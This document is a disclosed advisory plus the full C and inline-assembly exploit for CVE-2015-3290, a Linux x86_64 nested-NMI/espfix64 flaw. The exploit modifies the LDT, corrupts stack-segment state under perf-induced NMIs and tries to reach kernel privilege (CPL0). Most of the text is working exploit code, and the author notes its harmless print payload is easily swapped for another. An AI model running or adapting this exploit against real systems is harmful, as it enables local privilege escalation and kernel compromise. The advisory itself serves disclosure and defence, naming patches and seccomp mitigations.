1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 |
/* > +++++ CVE-2015-3290 +++++ > > High impact NMI bug on x86_64 systems 3.13 and newer, embargoed.Also fixed by: > > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a > > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290. > > You can mitigate CVE-2015-3290 by blocking modify_ldt or > perf_event_open using seccomp.A fully-functional, portable, reliable > exploit is privately available and will be published in a week or two. > *Patch your systems* And here's a real advisory: If an NMI returns via espfix64 and is interrupted during espfix64 setup by another NMI, the return state is corrupt.This is exploitable for reliable privilege escalation on any Linux x86_64 system in which untrusted code can arrange for espfix64 to be invoked and for NMIs to be nested. Glossing over a lot of details, the basic structure of Linux' nested NMI handling is: nmi_handler: if (in_nmi) { nmi_latched = true; return; } in_nmi = true; handle the nmi; atomically (this is magic): if (nmi_latched) { nmi_latched = false; start over; } else { in_nmi = false; return and unmask NMIs; } Alas, on x86_64, there is no reasonable way to block NMIs to run the atomic part of that pseudocode atomically.Instead, the entire atomic piece is implemented by the single instruction IRET. But x86_64 is more broken than just that.The IRET instruction does not restore register state correctly [1] when returning to a 16-bit stack segment.x86_64 has a complicated workaround called espfix64.If espfix64 is invoked on return, a well-behaved IRET is emulated by a complicated scheme that involves manually switching stacks.During the stack switch, there is a window of approximately 19 instructions between the start of espfix64's access to the original stack and when espfix64 is done with the original stack.If a nested NMI occurs during this window, then the atomic part of the basic nested NMI algorithm is observably non-atomic. Depending on exactly where in this window the nested NMI hits, the results vary.Most nested NMIs will corrupt the return context and crash the calling process.Some are harmless except that the nested NMI gets ignored.There is a two-instruction window in which the return context ends up with user-controlled RIP and CS set to __KERNEL_CS. A careful exploit (attached) can recover from all the crashy failures and can regenerate a valid *privileged* state if a nested NMI occurs during the two-instruction window.This exploit appears to work reasonably quickly across a fairly wide range of Linux versions. If you have SMEP, this exploit is likely to panic the system.Writing a usable exploit against a SMEP system would be considerably more challenging, but it's surely possible. Measures like UDEREF are unlikely to help, because this bug is outside any region that can be protected using paging or segmentation tricks. However, recent grsecurity kernels seem to forcibly disable espfix64, so they're not vulnerable in the first place. A couple of notes: - This exploit's payload just prints the text "CPL0".The exploit will keep going after printing CPL0 so you can enjoy seeing the frequency with which it wins.Interested parties could easily write different payloads.I doubt that any existing exploit mitigation techniques would be useful against this type of attack. - If you are using a kernel older than v4.1, a 64-bit build of the exploit will trigger a signal handling bug and crash.Defenders should not rejoice, because the exploit works fine when build as a 32-bit binary or (so I'm told) as an x32 binary. - This is the first exploit I've ever written that contains genuine hexadecimal code.The more assembly-minded among you can have fun figuring out why :) [1] By "correctly", I mean that the register state ends up different from that which was saved in the stack frame, not that the implementation doesn't match the spec in the microcode author's minds. The spec is simply broken (differently on AMD and Intel hardware, perhaps unsurprisingly.) --Andy */ /* * Copyright (c) 2015 Andrew Lutomirski. * GPL v2 * * Build with -O2.Don't use -fno-omit-frame-pointer. * * Thanks to Petr Matousek for pointing out a bug in the exploit. */ #define _GNU_SOURCE #include <stdlib.h> #include <stdio.h> #include <inttypes.h> #include <asm/ldt.h> #include <unistd.h> #include <sys/syscall.h> #include <asm/processor-flags.h> #include <setjmp.h> #include <signal.h> #include <string.h> #include <err.h> /* Abstractions for some 32-bit vs 64-bit differences. */ #ifdef __x86_64__ # define REG_IP REG_RIP # define REG_SP REG_RSP # define REG_AX REG_RAX struct selectors { unsigned short cs, gs, fs, ss; }; static unsigned short *ssptr(ucontext_t *ctx) { struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; return &sels->ss; } static unsigned short *csptr(ucontext_t *ctx) { struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; return &sels->cs; } #else # define REG_IPREG_EIP # define REG_SPREG_ESP # define REG_AXREG_EAX # define REG_CR2 (REG_SS + 3) static greg_t *ssptr(ucontext_t *ctx) { return &ctx->uc_mcontext.gregs[REG_SS]; } static greg_t *csptr(ucontext_t *ctx) { return &ctx->uc_mcontext.gregs[REG_CS]; } #endif static char altstack_data[SIGSTKSZ]; static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *), int flags) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = handler; sa.sa_flags = SA_SIGINFO | flags; sigemptyset(&sa.sa_mask); if (sigaction(sig, &sa, 0)) err(1, "sigaction"); } static jmp_buf jmpbuf; static volatile unsigned long expected_rsp; static volatile unsigned int cpl0; static void handler(int sig, siginfo_t *info, void *ctx_void) { ucontext_t *ctx = (ucontext_t*)ctx_void; unsigned long sig_err = ctx->uc_mcontext.gregs[REG_ERR]; unsigned long sig_trapno = ctx->uc_mcontext.gregs[REG_TRAPNO]; char errdesc[64] = ""; if (sig_trapno == 14) { strcpy(errdesc, " "); if (sig_err & (1 << 0)) strcat(errdesc, "PRESENT "); if (sig_err & (1 << 1)) strcat(errdesc, "WRITE "); if (sig_err & (1 << 2)) strcat(errdesc, "USER "); sprintf(errdesc + strlen(errdesc), "at 0x%llX", (unsigned long long)ctx->uc_mcontext.gregs[REG_CR2]); } else if (sig_err != 0) { const char *src = (sig_err & 1) ? " EXT" : ""; const char *table; if ((sig_err & 0x6) == 0x0) table = "GDT"; else if ((sig_err & 0x6) == 0x4) table = "LDT"; else if ((sig_err & 0x6) == 0x2) table = "IDT"; else table = "???"; sprintf(errdesc, " %s%s index %lu, ", table, src, sig_err >> 3); } char trapname[32]; if (sig_trapno == 13) strcpy(trapname, "GP"); else if (sig_trapno == 11) strcpy(trapname, "NP"); else if (sig_trapno == 12) strcpy(trapname, "SS"); else if (sig_trapno == 14) strcpy(trapname, "PF"); else if (sig_trapno == 32) strcpy(trapname, "IRET");/* X86_TRAP_IRET */ else sprintf(trapname, "%lu", sig_trapno); printf("+ State was corrupted: %s #%s(0x%lx%s)\n", (sig == SIGSEGV ? "SIGSEGV" : "SIGTRAP"), trapname, (unsigned long)sig_err, errdesc); if (cpl0) { printf("CPL0\n"); cpl0 = 0; } if (!(ctx->uc_mcontext.gregs[REG_EFL] & X86_EFLAGS_IF)) printf("RFLAGS = 0x%llX (interrupts disabled)\n", (unsigned long long)ctx->uc_mcontext.gregs[REG_EFL]); if (ctx->uc_mcontext.gregs[REG_SP] != expected_rsp) printf("RSP = 0x%016llX\n", (unsigned long long)ctx->uc_mcontext.gregs[REG_SP]); unsigned short normal_ss; asm ("mov %%ss, %0" : "=rm" (normal_ss)); if (*ssptr(ctx) != 0x7 && *ssptr(ctx) != normal_ss) printf("SS = 0x%hX\n", *ssptr(ctx)); siglongjmp(jmpbuf, 1); } static void set_ldt(void) { /* Boring 16-bit data segment. */ const struct user_desc data_desc = { .entry_number= 0, .base_addr = 0, .limit = 0xfffff, .seg_32bit = 0, .contents= 0, /* Data, expand-up */ .read_exec_only= 0, .limit_in_pages= 0, .seg_not_present = 0, .useable = 0 }; if (syscall(SYS_modify_ldt, 1, &data_desc, sizeof(data_desc)) != 0) err(1, "modify_ldt"); } int main(int argc, char **argv) { static unsigned short orig_ss; /* avoid RSP references */ set_ldt(); sethandler(SIGSEGV, handler, SA_ONSTACK); sethandler(SIGTRAP, handler, SA_ONSTACK); stack_t stack = { .ss_sp = altstack_data, .ss_size = SIGSTKSZ, }; if (sigaltstack(&stack, NULL) != 0) err(1, "sigaltstack"); printf("If I produce no output, then either your kernel is okay\n" "or you didn't abuse perf appropriately.\n" "Run me under heavy perf load.For example:\n" "perf record -g -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]); if (sizeof(void *) != 4) { printf("*** WARNING *** A 64-bit build of this exploit will not\n" "work correctly on kernels before v4.1 due to\n" "a signal handling bug.Build for 32-bit\n" "or x32 instead\n"); } sigsetjmp(jmpbuf, 1); asm volatile ("mov %%ss, %0" : "=rm" (orig_ss)); while (1) { #ifdef __x86_64__ asm volatile ( /* A small puzzle for the curious reader. */ "mov $2048, %%rbp \n\t" /* Save rsp for diagnostics */ "mov %%rsp, %[expected_rsp] \n\t" /* * Let 'er rip. */ "mov %[ss], %%ss \n\t" /* begin corruption */ "movl $1000, %%edx \n\t" "1: decl %%edx \n\t" "jnz 1b \n\t" "mov %%ss, %%eax \n\t" /* grab SS to display */ /* Did we enter CPL0? */ "mov %%cs, %%dx \n\t" "testw $3, %%dx \n\t" "jnz 2f \n\t" "incl cpl0(%%rip) \n\t" "leaq 3f(%%rip), %%rcx\n\t" "movl $0x200, %%r11d \n\t" "sysretq \n\t" "2: \n\t" /* * Stop further corruption.We need to check CPL * first because we need RPL == CPL. */ "mov %[orig_ss], %%ss \n\t" /* end corruption */ "subq $128, %%rsp \n\t" "pushfq \n\t" "testl $(1<<9),(%%rsp) \n\t" "addq $136, %%rsp \n\t" "jz 3f \n\t" "cmpl %[ss], %%eax \n\t" "je 4f \n\t" "3: int3 \n\t" "4: \n\t" : [expected_rsp] "=m" (expected_rsp) : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) : "rax", "rcx", "rdx", "rbp", "r11", "flags" ); #else asm volatile ( /* A small puzzle for the curious reader. */ "mov %%ebp, %%esi \n\t" "mov $2048, %%ebp \n\t" /* Save rsp for diagnostics */ "mov %%esp, %[expected_rsp] \n\t" /* * Let 'er rip. */ "mov %[ss], %%ss \n\t" /* begin corruption */ "movl $1000, %%edx \n\t" "1: .byte 0xff, 0xca \n\t" /* decl %edx */ "jnz 1b \n\t" "mov %%ss, %%eax \n\t" /* grab SS to display */ /* Did we enter CPL0? */ "mov %%cs, %%dx \n\t" "testw $3, %%dx \n\t" "jnz 2f \n\t" ".code64 \n\t" "incl cpl0(%%rip) \n\t" "leaq 3f(%%rip), %%rcx \n\t" "movl $0x200, %%r11d \n\t" "sysretl \n\t" ".code32 \n\t" "2: \n\t" /* * Stop further corruption.We need to check CPL * first because we need RPL == CPL. */ "mov %[orig_ss], %%ss \n\t" /* end corruption */ "pushf \n\t" "testl $(1<<9),(%%esp) \n\t" "addl $4, %%esp \n\t" "jz 3f \n\t" "cmpl %[ss], %%eax \n\t" "je 4f \n\t" "3: int3 \n\t" "4: mov %%esi, %%ebp \n\t" : [expected_rsp] "=m" (expected_rsp) : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) : "eax", "ecx", "edx", "esi", "flags" ); #endif /* * If we ended up with IF == 0, there's no easy way to fix * it.Instead, make frequent syscalls to avoid hanging * the system. */ syscall(0x3fffffff); } } |